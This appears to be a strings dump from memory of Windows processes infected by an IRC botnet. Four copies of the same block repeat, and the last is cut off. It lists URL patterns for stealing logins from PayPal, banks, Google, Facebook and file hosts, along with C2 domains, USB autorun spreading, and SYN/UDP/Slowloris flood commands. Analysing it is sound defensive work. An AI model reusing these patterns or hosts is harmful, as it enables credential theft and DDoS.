%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\services.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\services.exe

c:\%original file name%.exe

Explorer.EXE_888_rwx_01E60000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

c:\%original file name%.exe

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

\\.\pipe\e621ca05

%WinDir%\Explorer.EXE

%WinDir%

e621ca05.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\explorer.exe

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data\2.tmp

%Documents and Settings%\%current user%\Application Data\2.exe

svchost.exe_936_rwx_00EA0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

c:\%original file name%.exe

svchost.exe_1020_rwx_00B00000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

